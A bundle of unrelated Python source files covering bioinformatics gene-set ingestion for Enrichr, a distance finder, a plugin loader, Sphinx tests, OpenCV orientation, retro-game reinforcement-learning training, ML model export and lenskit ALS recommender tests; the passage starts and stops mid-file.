"ENCODE_TF_ChIP-seq_2015": "enrichr_ChIP_gene_set::ENCODE_TF",
"Epigenomics_Roadmap_HM_ChIP-seq": "enrichr_ChIP_gene_set::ER_HM",
"ESCAPE": "ESCAPE_gene_set::ESCAPE",
"GeneSigDB": "genesigdb_gene_signature::gsigdb",
"GTEx_Tissue_Sample_Gene_Expression_Profiles_down": "enrichr_tissue_signature::GTEx_dn",
"GTEx_Tissue_Sample_Gene_Expression_Profiles_up": "enrichr_tissue_signature::GTEx_up",
"HMDB_Metabolites": "HMDB_metabolite_signatures::HMDB",
"Human_Gene_Atlas": "enrichr_tissue_signature::HGA",
"Human_Phenotype_Ontology": "enrichr_phenotype_signature::HPO",
"KEA_2015": "KEA_kinase_signatures::KEA",
"Kinase_Perturbations_from_GEO_down": "GEO_expression_set::kinase_dn",
"Kinase_Perturbations_from_GEO_up": "GEO_expression_set::kinase_up",
"Ligand_Perturbations_from_GEO_down": "GEO_expression_set::ligand_dn",
"Ligand_Perturbations_from_GEO_up": "GEO_expression_set::ligand_up",
"LINCS_L1000_Chem_Pert_down": "LINCS_down_set::LINCS_dn",
"LINCS_L1000_Chem_Pert_up": "LINCS_up_set::LINCS_up",
"MCF7_Perturbations_from_GEO_down": "GEO_expression_set::MCF7_dn",
"MCF7_Perturbations_from_GEO_up": "GEO_expression_set::MCF7_up",
"MGI_Mammalian_Phenotype_2013": "enrichr_phenotype_signature::MGI",
"MGI_Mammalian_Phenotype_Level_3": "enrichr_phenotype_signature::MGI_L3",
"MGI_Mammalian_Phenotype_Level_4": "enrichr_phenotype_signature::MGI_L4",
"Microbe_Perturbations_from_GEO_down": "GEO_expression_set::microbe_dn",
"Microbe_Perturbations_from_GEO_up": "GEO_expression_set::microbe_up",
"Mouse_Gene_Atlas": "enrichr_phenotype_signature::MGA",
"NCI-60_Cancer_Cell_Lines": "enrichr_cell_signature::NCI",
"NCI-Nature_2016": "enrichr_pathway::NCI",
"NURSA_Human_Endogenous_Complexome": "PPI_complex::NHEC",
"OMIM_Disease": "enrichr_phenotype_signature::OMIM-dis",
"OMIM_Expanded": "enrichr_phenotype_signature::OMIM-exp",
"Panther_2016": "panther_classification::Panther",
"PPI_Hub_Proteins": "PPI_hub::",
"SILAC_Phosphoproteomics": "SILAC_phosphoproteomics::SILCA",
"Single_Gene_Perturbations_from_GEO_down": "GEO_expression_set::gene_dn",
"Single_Gene_Perturbations_from_GEO_up": "GEO_expression_set::gene_up",
"TargetScan_microRNA": "TargetScan_microRNA::TargetScan",
"TF-LOF_Expression_from_GEO": "GEO_expression_set::TF-LOF",
"Tissue_Protein_Expression_from_Human_Proteome_Map": "enrichr_tissue_signature::HPM",
"Tissue_Protein_Expression_from_ProteomicsDB": "enrichr_tissue_signature::PDB",
"Virus_Perturbations_from_GEO_down": "GEO_expression_set::virus_dn",
"Virus_Perturbations_from_GEO_up": "GEO_expression_set::virus_up",
"WikiPathways_2016": "enrichr_pathway::WikiPath"
}
super(Enrichr, self).__init__(name, url_base, aliases, args)
self.chunk_size = 5000
self.date_modified = 'unknown'
self.source_url = "http://amp.pharm.mssm.edu/Enrichr/"
self.image = "https://lw-static-files.s3.amazonaws.com/public/logos/2688.png"
self.reference = ("Kuleshov MV, Jones MR, Rouillard AD, et al. Enrichr: a comprehensive "
"gene set enrichment analysis web server 2016 update. Nucleic Acids Res. "
"2016;44(W1):W90-7.")
self.pmid = 27141961
self.license = ('Enrichr\'s web-based tools and services are free for academic, non-profit '
'use, but for commercial uses please contact <a '
'href="http://www.ip.mountsinai.org/">MSIP</a> for a license.')
def get_remote_url(self, alias):
"""Return the remote url needed to fetch the file corresponding to the
alias.
This returns the url needed to fetch the file corresponding to the
alias. The url is constructed using the base_url, alias, and source
version information.
Args:
alias (str): An alias defined in self.aliases.
Returns:
str: The url needed to fetch the file corresponding to the alias.
"""
url = self.url_base + alias
return url
def table(self, raw_line, version_dict):
"""Uses the provided raw_line file to produce a 2table_edge file, an
edge_meta file, a node and/or node_meta file (only for property nodes).
This returns noting but produces the table formatted files from the
provided raw_line file:
raw_line (line_hash, line_num, file_id, raw_line)
table_file (line_hash, n1name, n1hint, n1type, n1spec,
n2name, n2hint, n2type, n2spec, et_hint, score,
table_hash)
edge_meta (line_hash, info_type, info_desc)
node_meta (node_id,
info_type (evidence, relationship, experiment, or link),
info_desc (text))
node (node_id, n_alias, n_type)
Args:
raw_line(str): The path to the raw_line file
version_dict (dict): A dictionary describing the attributes of the
alias for a source.
Returns:
"""
#outfiles
table_file = raw_line.replace('raw_line', 'table')
n_meta_file = raw_line.replace('raw_line', 'node_meta')
node_file = raw_line.replace('raw_line', 'node')
#static column values
alias = version_dict['alias']
source = version_dict['source']
mouse_aliases = ["MGI_Mammalian_Phenotype_2013", \
"MGI_Mammalian_Phenotype_Level_3",\
"MGI_Mammalian_Phenotype_Level_4", "Mouse_Gene_Atlas"]
n1type = 'property'
n_type = 'Property'
n1spec = '0'
n1hint = source + '_' + alias
n2type = 'gene'
if alias in mouse_aliases:
n2spec = '10090'
n2hint = 'MGI'
else:
n2spec = '9606'
n2hint = 'HGNC'
(et_hint, node_prefix) = self.aliases[alias].split('::')
score = 1
if alias == 'PPI_Hub_Proteins':
n1type = 'gene'
n1spec = '9606'
n1hint = 'HGNC'
with open(raw_line, encoding='utf-8') as infile, \
open(table_file, 'w') as edges,\
open(n_meta_file, 'w') as n_meta, \
open(node_file, 'w') as nfile:
edge_writer = csv.writer(edges, delimiter='\t', lineterminator='\n')
n_meta_writer = csv.writer(n_meta, delimiter='\t', lineterminator='\n')
n_writer = csv.writer(nfile, delimiter='\t', lineterminator='\n')
for line in infile:
line = line.replace('"', '').strip().split('\t')
#line = re.split('\s{2,}', line)
if len(line) == 1:
continue
chksm = line[0]
raw = line[3:]
n1_orig_name = raw[0]
if not n1_orig_name:
continue
n1_kn_name = n1_orig_name
if alias != 'PPI_Hub_Proteins':
n1_kn_name = cf.pretty_name(node_prefix + '_'+ n1_orig_name)
n_meta_writer.writerow([n1_kn_name, 'orig_desc', n1_orig_name])
n_writer.writerow([n1_kn_name, n1_kn_name, n_type])
for n2_id in raw[1:]:
n2_id = n2_id.split(',')[0]
if n2_id == '':
continue
hasher = hashlib.md5()
hasher.update('\t'.join([chksm, n1_kn_name, n1hint, n1type, n1spec,\
n2_id, n2hint, n2type, n2spec, et_hint,\
str(score)]).encode())
t_chksum = hasher.hexdigest()
edge_writer.writerow([chksm, n1_kn_name, n1hint, n1type, n1spec, \
n2_id, n2hint, n2type, n2spec, et_hint, score, \
t_chksum])
if alias != 'PPI_Hub_Proteins':
outfile = n_meta_file.replace('node_meta', 'unique.node_meta')
tu.csu(n_meta_file, outfile)
outfile = node_file.replace('node', 'unique.node')
tu.csu(node_file, outfile)
else:
os.remove(n_meta_file)
os.remove(node_file)
def main():
"""Runs compare_versions (see utilities.compare_versions) on a Enrichr
object
This runs the compare_versions function on a Enrichr object to find the
version information of the source and determine if a fetch is needed. The
version information is also printed.
Returns:
dict: A nested dictionary describing the version information for each
alias described in Enrichr.
"""
compare_versions(Enrichr())
if __name__ == "__main__":
main()
|
#Author: Jayendra Matarage
#Title: Distance Finder
#Date : 31, Jan, 2019
from Getdata import Getdata
from distance import Distance
getdata = Getdata()
distanceCal = Distance()
def main():
print("---------------------------------")
print("|\t\tDISTANCE FINDER\t\t|")
print("---------------------------------")
point_one = input("Enter first position: ")
while point_one == '':
point_one = input("Re Enter first position: ")
check = getdata.checkPoing(point_one)
while len(check) == 0:
print("No position data")
point_one = input("Re Enter first position: ")
check = getdata.checkPoing(point_one)
point_two = input("Enter second position: ")
while point_two == '':
point_two = input("Re Enter second position: ")
check = getdata.checkPoing(point_two)
while len(check) == 0:
print("No position data")
point_two = input("Re Enter second position: ")
check = getdata.checkPoing(point_two)
data = getdata.readData(point_one,point_two)
print("|\t First Point: " + data[0][0][0][0])
print("|\t Second Point: " + data[1][0][0][0])
print("---------------------------------")
distance = distanceCal.generateDistance(data[0][0][0],data[1][0][0])
print("Approximate distance of " + data[0][0][0][0] + " to " + data[1][0][0][0] + " is " + str(distance) + " km")
choice = input("Find distance again ? (Y)es or (N)o : ")
if(choice == "Y"):
main()
if __name__ == '__main__':
main()
|
class LTEMol():
def __init__():
pass
def tex():
pass
def Tbkg():
pass
|
"""
# Copyright 2022 Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
import logging
from cibyl.exceptions.plugin import MissingPlugin
from cibyl.models.ci.environment import Environment
LOG = logging.getLogger(__name__)
def extend_models(plugin_name):
try:
LOG.info("Loading plugin: {}".format(plugin_name))
loaded_plugin = __import__(f"cibyl.plugins.{plugin_name}",
fromlist=[''])
loaded_plugin.Plugin()._extend(Environment.API)
except (ImportError, ModuleNotFoundError):
raise MissingPlugin(plugin_name)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2011, Sebastian Wiesner <lunaryorn@gmail.com>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
test_role
=========
Test the ``issue`` role.
.. moduleauthor:: Sebastian Wiesner <lunaryorn@gmail.com>
"""
from __future__ import (print_function, division, unicode_literals,
absolute_import)
import pytest
from sphinxcontrib.issuetracker import Issue
def pytest_funcarg__issue(request):
"""
A dummy issue, just to trigger issue resolval so that transformations can
be seen in the output.
"""
return Issue(id='10', title='Eggs', closed=False, url='eggs')
@pytest.mark.with_content(':issue:`10`')
def test_simple(doctree, issue):
"""
Test simple usage of the role.
"""
pytest.assert_issue_pending_xref(doctree, '10', '10')
@pytest.mark.with_content(':issue:`foo <10>`')
def test_with_title(doctree, issue):
"""
Test role with an explicit title.
"""
pytest.assert_issue_pending_xref(doctree, '10', 'foo')
@pytest.mark.confoverrides(issuetracker_plaintext_issues=False)
@pytest.mark.with_content(':issue:`10` #10')
def test_without_plaintext_issues(doctree, issue):
"""
Test that the role still works even if plaintext issues are disabled.
"""
pytest.assert_issue_pending_xref(doctree, '10', '10')
|
'''Display a sum problems with a function returning a string,
not printing directly.
'''
def sumProblemString(x, y):
sum = x + y
return 'The sum of {} and {} is {}.'.format(x, y, sum)
def main():
print(sumProblemString(2, 3))
print(sumProblemString(1234567890123, 535790269358))
a = int(input("Enter an integer: "))
b = int(input("Enter another integer: "))
print(sumProblemString(a, b))
main()
|
import os
import cv2
import numpy as np
import time
def find_orientation(image, template):
img_rgb = image
if len(img_rgb.shape) == 3:
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
else:
img_gray = image
#w, h = template.shape[::-1]
res = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)
threshold = 0.6
loc = np.where(res >= threshold)
count = 0
for pt in zip(*loc[::-1]):
count=count+1
# cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0,0,255), 2)
#print("count: " + str(count))
# cv2.imshow('Detected Point', img_rgb)
# cv2.waitKey()
return count
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
template = cv2.imread(os.path.join(BASE_PATH, "query.png"), 0)
def orientate(image):
start_time = time.time()
images = [image]
counts = []
counts.append(find_orientation(image, template))
image = cv2.rotate(image, cv2.ROTATE_180)
images.append(image)
counts.append(find_orientation(image, template))
max_count = 0
max_index = 0
for index, count in enumerate(counts):
if count > max_count:
max_count = count
max_index = index
duration = time.time() - start_time
return images[max_index], (max_index*180), duration
|
"""
Train an agent using Proximal Policy Optimization from OpenAI Baselines
"""
import argparse
import sys
import retro
import os
import numpy as np
import gym
import tensorflow as tf
from baselines.common.vec_env import SubprocVecEnv
from baselines.common.vec_env.vec_video_recorder import VecVideoRecorder
from ppo2 import ppo2
from baselines.common.atari_wrappers import WarpFrame, ScaledFloatFrame
from acer import acer
from RyuDiscretizer import RyuDiscretizer, RyuDiscretizerDefending
FPS = 30
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
LOG_PATH = os.path.join(SCRIPT_DIR, 'model')
CHECKPOINTS_PATH = os.path.join(LOG_PATH, 'checkpoints')
MODEL_PATH = os.path.join(CHECKPOINTS_PATH, 'latest')
def make_sf2_env():
retro.data.Integrations.add_custom_path(
os.path.join(SCRIPT_DIR, "custom_integrations")
)
env = retro.make(
game='SuperStreetFighter2-Snes',
state=retro.State.DEFAULT,
scenario=None,
inttype=retro.data.Integrations.CUSTOM_ONLY,
obs_type=retro.Observations.RAM, # retro.Observations.IMAGE
players=1, # players=2
use_restricted_actions=retro.Actions.FILTERED, # retro.Actions.DISCRETE
)
env = RyuDiscretizerDefending(env)
# env = WarpFrame(env, width=61, height=47, grayscale=True)
# env = ScaledFloatFrame(env)
return env
def main():
os.environ['OPENAI_LOGDIR'] = LOG_PATH
number_of_environments = 1
venv = SubprocVecEnv([make_sf2_env] * number_of_environments)
video_path = './recording'
video_length = 5 * 60 * FPS
venv = VecVideoRecorder(venv, video_path, record_video_trigger=lambda step: step %
video_length == 0, video_length=video_length)
# ppo2.learn(
# network='mlp',
# env=venv,
# # eval_env=venv,
# total_timesteps=40000000,
# nsteps=128, # 5 * FPS,
# nminibatches=number_of_environments,
# lam=0.95,
# gamma=0.99,
# noptepochs=3,
# log_interval=1000,
# ent_coef=.01,
# lr=lambda alpha: 2.5e-4 * alpha,
# vf_coef=1.0,
# cliprange=lambda alpha: 0.1 * alpha,
# save_interval=1000,
# # load_path=MODEL_PATH,
# # neuronal network parameters
# activation=tf.nn.relu,
# num_layers=2, # 4, 2
# num_hidden=48, # 64, 64
# layer_norm=False
# )
acer.learn(
network='mlp', # 'impala_cnn'
env=venv,
total_timesteps=40000000,
nsteps=128, # 5 * FPS,
q_coef=1.0,
ent_coef=0.001,
max_grad_norm=10,
lr=7e-4,
lrschedule='linear',
rprop_epsilon=1e-5,
rprop_alpha=0.99,
gamma=0.99,
log_interval=1000,
buffer_size=50000,
replay_ratio=4,
replay_start=10000,
c=10.0,
trust_region=True,
delta=1,
alpha=0.99,
# load_path=MODEL_PATH,
save_interval=1000,
# neuronal network parameters
activation=tf.nn.relu,
num_layers=2, # 4, 2
num_hidden=48, # 64, 64
layer_norm=False
)
if __name__ == '__main__':
main()
|
import numpy as np
import pandas as pd
import os
from os.path import exists, join
from tensorflow.keras.layers import Input, Dense, Dropout, GaussianNoise
from tensorflow.keras.models import Model
from tensorflow.keras.regularizers import l2
from tensorflow.keras.optimizers import Adam, SGD
import xarray as xr
class DenseNeuralNetwork(object):
"""
A Dense Neural Network Model that can support arbitrary numbers of hidden layers.
Attributes:
hidden_layers: Number of hidden layers
hidden_neurons: Number of neurons in each hidden layer
inputs: Number of input values
outputs: Number of output values
activation: Type of activation function
output_activation: Activation function applied to the output layer
optimizer: Name of optimizer or optimizer object.
loss: Name of loss function or loss object
use_noise: Whether or not additive Gaussian noise layers are included in the network
noise_sd: The standard deviation of the Gaussian noise layers
use_dropout: Whether or not Dropout layers are added to the network
dropout_alpha: proportion of neurons randomly set to 0.
batch_size: Number of examples per batch
epochs: Number of epochs to train
verbose: Level of detail to provide during training
model: Keras Model object
"""
def __init__(self, hidden_layers=1, hidden_neurons=4, activation="relu",
output_activation="linear", optimizer="adam", loss="mse", use_noise=False, noise_sd=0.01,
lr=0.001, use_dropout=False, dropout_alpha=0.1, batch_size=128, epochs=2,
l2_weight=0.01, sgd_momentum=0.9, adam_beta_1=0.9, adam_beta_2=0.999, decay=0, verbose=0,
classifier=False):
self.hidden_layers = hidden_layers
self.hidden_neurons = hidden_neurons
self.activation = activation
self.output_activation = output_activation
self.optimizer = optimizer
self.optimizer_obj = None
self.sgd_momentum = sgd_momentum
self.adam_beta_1 = adam_beta_1
self.adam_beta_2 = adam_beta_2
self.loss = loss
self.lr = lr
self.l2_weight = l2_weight
self.batch_size = batch_size
self.use_noise = use_noise
self.noise_sd = noise_sd
self.use_dropout = use_dropout
self.dropout_alpha = dropout_alpha
self.epochs = epochs
self.decay = decay
self.verbose = verbose
self.classifier = classifier
self.y_labels = None
self.model = None
self.optimizer_obj = None
def build_neural_network(self, inputs, outputs):
"""
Create Keras neural network model and compile it.
Args:
inputs (int): Number of input predictor variables
outputs (int): Number of output predictor variables
"""
nn_input = Input(shape=(inputs,), name="input")
nn_model = nn_input
for h in range(self.hidden_layers):
nn_model = Dense(self.hidden_neurons, activation=self.activation,
kernel_regularizer=l2(self.l2_weight), name=f"dense_{h:02d}")(nn_model)
if self.use_dropout:
nn_model = Dropout(self.dropout_alpha, name=f"dropout_h_{h:02d}")(nn_model)
if self.use_noise:
nn_model = GaussianNoise(self.noise_sd, name=f"ganoise_h_{h:02d}")(nn_model)
nn_model = Dense(outputs,
activation=self.output_activation, name=f"dense_{self.hidden_layers:02d}")(nn_model)
self.model = Model(nn_input, nn_model)
if self.optimizer == "adam":
self.optimizer_obj = Adam(lr=self.lr, beta_1=self.adam_beta_1, beta_2=self.adam_beta_2, decay=self.decay)
elif self.optimizer == "sgd":
self.optimizer_obj = SGD(lr=self.lr, momentum=self.sgd_momentum, decay=self.decay)
self.model.compile(optimizer=self.optimizer, loss=self.loss)
def fit(self, x, y):
inputs = x.shape[1]
if len(y.shape) == 1:
outputs = 1
else:
outputs = y.shape[1]
if self.classifier:
outputs = np.unique(y).size
self.build_neural_network(inputs, outputs)
if self.classifier:
self.y_labels = np.unique(y)
y_class = np.zeros((y.shape[0], self.y_labels.size), dtype=np.int32)
for l, label in enumerate(self.y_labels):
y_class[y == label, l] = 1
self.model.fit(x, y_class, batch_size=self.batch_size, epochs=self.epochs, verbose=self.verbose)
else:
self.model.fit(x, y, batch_size=self.batch_size, epochs=self.epochs, verbose=self.verbose)
return
def save_fortran_model(self, filename):
"""
Save neural network weights to a netCDF file that can be read by module_neural_net.f90.
Args:
filename: Name of the neural network file.
Returns:
"""
nn_ds = xr.Dataset()
num_dense = 0
layer_names = []
for layer in self.model.layers:
if "dense" in layer.name:
layer_names.append(layer.name)
dense_weights = layer.get_weights()
nn_ds[layer.name + "_weights"] = ((layer.name + "_in", layer.name + "_out"), dense_weights[0])
nn_ds[layer.name + "_bias"] = ((layer.name + "_out",), dense_weights[1])
nn_ds[layer.name + "_weights"].attrs["name"] = layer.name
nn_ds[layer.name + "_weights"].attrs["activation"] = layer.get_config()["activation"]
num_dense += 1
nn_ds["layer_names"] = (("num_layers",), np.array(layer_names))
nn_ds.attrs["num_layers"] = num_dense
nn_ds.to_netcdf(filename, encoding={'layer_names':{'dtype': 'S1'}})
return
def predict(self, x):
if self.classifier:
y_prob = self.model.predict(x, batch_size=self.batch_size)
y_out = self.y_labels[np.argmax(y_prob, axis=1)].ravel()
else:
y_out = self.model.predict(x, batch_size=self.batch_size).ravel()
return y_out
def predict_proba(self, x):
y_prob = self.model.predict(x, batch_size=self.batch_size)
return y_prob
def save_scaler_csv(scaler_obj, input_columns, output_file):
"""
Save the scaler information to csv so that it can be read later.
Args:
scaler_obj: Scikit-learn StandardScaler object
input_columns:
output_file:
Returns:
"""
input_scaler_df = pd.DataFrame({"mean": scaler_obj.mean_, "scale": scaler_obj.scale_},
index=input_columns)
input_scaler_df.to_csv(output_file, index_label="input")
return input_scaler_df
def save_random_forest_csv(random_forest_model, features, out_path, forest_name="random_forest"):
"""
Converts a scikit-learn random forest object into a set of csv files for each tree in the forest. If the
specified directory does not currently exist, the function will create it.
Args:
random_forest_model: scikit learn RandomForestRegressor or RandomForestClassifier
features: list or array of feature names in the order of training
out_path: Path to directory containing random forest csv files.
forest_name: Name of the forest model
Returns:
"""
if not exists(join(out_path, forest_name)):
os.makedirs(join(out_path, forest_name))
feature_frame = pd.DataFrame(features, columns=["feature"])
feature_frame.to_csv(join(out_path, forest_name, f"{forest_name}_features.csv"), index_label="Index")
rf_frames = random_forest_dataframes(random_forest_model, features)
with open(join(out_path, forest_name, "tree_files.csv"), "w") as tree_file:
for r, rf_frame in enumerate(rf_frames):
tree_name = f"{forest_name}_tree_{r:04d}.csv"
rf_frame.to_csv(join(out_path, forest_name, tree_name), float_format='%1.16e',
index_label="Node")
tree_file.write(tree_name + "\n")
return
def random_forest_dataframes(random_forest_model, feature_names):
rf_frames = []
for d, dt in enumerate(random_forest_model.estimators_):
rf_frames.append(decision_tree_dataframe(dt, feature_names=feature_names))
return rf_frames
def decision_tree_dataframe(decision_tree_model, feature_names=None):
"""
Extracts the attributes of a decision tree into a DataFrame
Args:
decision_tree_model: scikit-learn DecisionTree object
feature_names: array of names for each input feature in the order they were put into the tree
Returns:
:class:`pandas.DataFrame` : The decision tree represented as a table.
"""
tree = decision_tree_model.tree_
tree_dict = {}
tree_vars = ["feature", "threshold", "value", "children_left", "children_right", "impurity"]
if feature_names is not None:
tree_vars.append("feature_name")
for tree_var in tree_vars:
if tree_var == "value":
if tree.value.shape[2] > 1:
# Assumes the tree value contains the number of instances in each class
# Calculates the probability of the second class assuming the classes are 0 and 1
tree_dict[tree_var] = tree.value[:, 0, 1] / tree.value[:, 0].sum(axis=1)
else:
tree_dict[tree_var] = tree.value[:, 0, 0]
elif tree_var == "feature_name":
feature_idx = getattr(tree, "feature")
feature_idx[feature_idx < 0] = -1
tree_dict[tree_var] = np.where(feature_idx >= 0, feature_names[feature_idx], "leaf node__")
else:
tree_dict[tree_var] = getattr(tree, tree_var)
tree_frame = pd.DataFrame(tree_dict, columns=tree_vars)
return tree_frame
def predict_decision_tree_frame(input_data, dt_frame):
"""
Generate predictions for a single example from a decision tree.
Args:
input_data: 1D array of input data
dt_frame: Decision tree in table format
Returns:
float: predicted value for input_data from tree.
"""
index = 0
not_leaf = True
value = -9999.0
while not_leaf:
value = dt_frame.loc[index, "value"]
if dt_frame.loc[index, "feature"] < 0:
not_leaf = False
else:
exceeds = input_data[dt_frame.loc[index, "feature"]] > dt_frame.loc[index, "threshold"]
if exceeds:
index = dt_frame.loc[index, "children_right"]
else:
index = dt_frame.loc[index, "children_left"]
return value
|
import logging
import pickle
# get a usable pickle disassembler
if pickle.HIGHEST_PROTOCOL >= 5:
from pickletools import dis as pickle_dis
else:
try:
from pickle5.pickletools import dis as pickle_dis
except ImportError:
pass
from lenskit.algorithms import als
from lenskit import util
import pandas as pd
import numpy as np
from pytest import approx, mark
from lenskit.util import Stopwatch
import lenskit.util.test as lktu
try:
import binpickle
except ImportError:
binpickle = None
_log = logging.getLogger(__name__)
simple_df = pd.DataFrame({'item': [1, 1, 2, 3],
'user': [10, 12, 10, 13],
'rating': [4.0, 3.0, 5.0, 2.0]})
methods = mark.parametrize('m', ['lu', 'cd'])
@methods
def test_als_basic_build(m):
algo = als.BiasedMF(20, iterations=10, progress=util.no_progress, method=m)
algo.fit(simple_df)
assert algo.bias.mean_ == approx(simple_df.rating.mean())
assert set(algo.user_index_) == set([10, 12, 13])
assert set(algo.item_index_) == set([1, 2, 3])
assert algo.user_features_.shape == (3, 20)
assert algo.item_features_.shape == (3, 20)
assert algo.n_features == 20
assert algo.n_users == 3
assert algo.n_items == 3
@methods
def test_als_no_bias(m):
algo = als.BiasedMF(20, iterations=10, bias=None, method=m)
algo.fit(simple_df)
assert algo.bias is None
assert set(algo.user_index_) == set([10, 12, 13])
assert set(algo.item_index_) == set([1, 2, 3])
assert algo.user_features_.shape == (3, 20)
assert algo.item_features_.shape == (3, 20)
preds = algo.predict_for_user(10, [3])
assert len(preds) == 1
@methods
def test_als_predict_basic(m):
algo = als.BiasedMF(20, iterations=10, method=m)
algo.fit(simple_df)
assert algo.bias.mean_ == approx(simple_df.rating.mean())
preds = algo.predict_for_user(10, [3])
assert len(preds) == 1
assert preds.index[0] == 3
assert preds.loc[3] >= -0.1
assert preds.loc[3] <= 5.1
def test_als_predict_basic_for_new_ratings():
algo = als.BiasedMF(20, iterations=10)
algo.fit(simple_df)
assert algo.bias.mean_ == approx(simple_df.rating.mean())
new_ratings = pd.Series([4.0, 5.0], index=[1, 2]) # items as index and ratings as values
preds = algo.predict_for_user(15, [3], new_ratings)
assert len(preds) == 1
assert preds.index[0] == 3
assert preds.loc[3] >= -0.1
assert preds.loc[3] <= 5.1
def test_als_predict_basic_for_new_user_with_new_ratings():
u = 10
i = 3
algo = als.BiasedMF(20, iterations=10)
algo.fit(simple_df)
preds = algo.predict_for_user(u, [i])
new_u_id = -1
new_ratings = pd.Series([4.0, 5.0], index=[1, 2]) # items as index and ratings as values
new_preds = algo.predict_for_user(new_u_id, [i], new_ratings)
assert preds.loc[i] == approx(new_preds.loc[i], rel=9e-2)
def test_als_predict_for_new_users_with_new_ratings():
n_users = 3
n_items = 2
new_u_id = -1
ratings = lktu.ml_test.ratings
np.random.seed(45)
users = np.random.choice(ratings.user.unique(), n_users)
items = np.random.choice(ratings.item.unique(), n_items)
algo = als.BiasedMF(20, iterations=10, method="lu")
algo.fit(ratings)
_log.debug("Items: " + str(items))
for u in users:
_log.debug(f"user: {u}")
preds = algo.predict_for_user(u, items)
user_data = ratings[ratings.user == u]
_log.debug("user_features from fit: " + str(algo.user_features_[algo.user_index_.get_loc(u), :]))
new_ratings = pd.Series(user_data.rating.to_numpy(), index=user_data.item) # items as index and ratings as values
new_preds = algo.predict_for_user(new_u_id, items, new_ratings)
_log.debug("preds: " + str(preds.values))
_log.debug("new_preds: " + str(new_preds.values))
_log.debug("------------")
assert new_preds.values == approx(preds.values, rel=9e-2)
def test_als_predict_bad_item():
algo = als.BiasedMF(20, iterations=10)
algo.fit(simple_df)
assert algo.bias.mean_ == approx(simple_df.rating.mean())
preds = algo.predict_for_user(10, [4])
assert len(preds) == 1
assert preds.index[0] == 4
assert np.isnan(preds.loc[4])
def test_als_predict_bad_user():
algo = als.BiasedMF(20, iterations=10)
algo.fit(simple_df)
assert algo.bias.mean_ == approx(simple_df.rating.mean())
preds = algo.predict_for_user(50, [3])
assert len(preds) == 1
assert preds.index[0] == 3
assert np.isnan(preds.loc[3])
@lktu.wantjit
@mark.slow
def test_als_train_large():
algo = als.BiasedMF(20, iterations=10)
ratings = lktu.ml_test.ratings
algo.fit(ratings)
assert algo.bias.mean_ == approx(ratings.rating.mean())
assert algo.n_features == 20
assert algo.n_items == ratings.item.nunique()
assert algo.n_users == ratings.user.nunique()
icounts = ratings.groupby('item').rating.count()
isums = ratings.groupby('item').rating.sum()
is2 = isums - icounts * ratings.rating.mean()
imeans = is2 / (icounts + 5)
ibias = pd.Series(algo.bias.item_offsets_, index=algo.item_index_)
imeans, ibias = imeans.align(ibias)
assert ibias.values == approx(imeans.values)
# don't use wantjit, use this to do a non-JIT test
def test_als_save_load():
original = als.BiasedMF(5, iterations=5, method='lu')
ratings = lktu.ml_test.ratings
original.fit(ratings)
assert original.bias.mean_ == approx(ratings.rating.mean())
mod = pickle.dumps(original)
_log.info('serialized to %d bytes', len(mod))
algo = pickle.loads(mod)
assert algo.bias.mean_ == original.bias.mean_
assert np.all(algo.bias.user_offsets_ == original.bias.user_offsets_)
assert np.all(algo.bias.item_offsets_ == original.bias.item_offsets_)
assert np.all(algo.user_features_ == original.user_features_)
assert np.all(algo.item_features_ == original.item_features_)
assert np.all(algo.item_index_ == original.item_index_)
assert np.all(algo.user_index_ == original.user_index_)
@mark.skipif(not binpickle, reason='binpickle not available')
def test_als_binpickle(tmp_path):
"Test saving ALS with BinPickle"
original = als.BiasedMF(20, iterations=5, method='lu')
ratings = lktu.ml_test.ratings
original.fit(ratings)
assert original.bias.mean_ == approx(ratings.rating.mean())
file = tmp_path / 'als.bpk'
binpickle.dump(original, file)
with binpickle.BinPickleFile(file) as bpf:
# the pickle data should be small
_log.info('serialized to %d pickle bytes', bpf.entries[-1].dec_length)
pickle_dis(bpf._read_buffer(bpf.entries[-1]))
assert bpf.entries[-1].dec_length < 2048
algo = bpf.load()
assert algo.bias.mean_ == original.bias.mean_
assert np.all(algo.bias.user_offsets_ == original.bias.user_offsets_)
assert np.all(algo.bias.item_offsets_ == original.bias.item_offsets_)
assert np.all(algo.user_features_ == original.user_features_)
assert np.all(algo.item_features_ == original.item_features_)
assert np.all(algo.item_index_ == original.item_index_)
assert np.all(algo.user_index_ == original.user_index_)
@lktu.wantjit
@mark.slow
def test_als_method_match():
lu = als.BiasedMF(20, iterations=15, reg=(2, 0.001), method='lu', rng_spec=42)
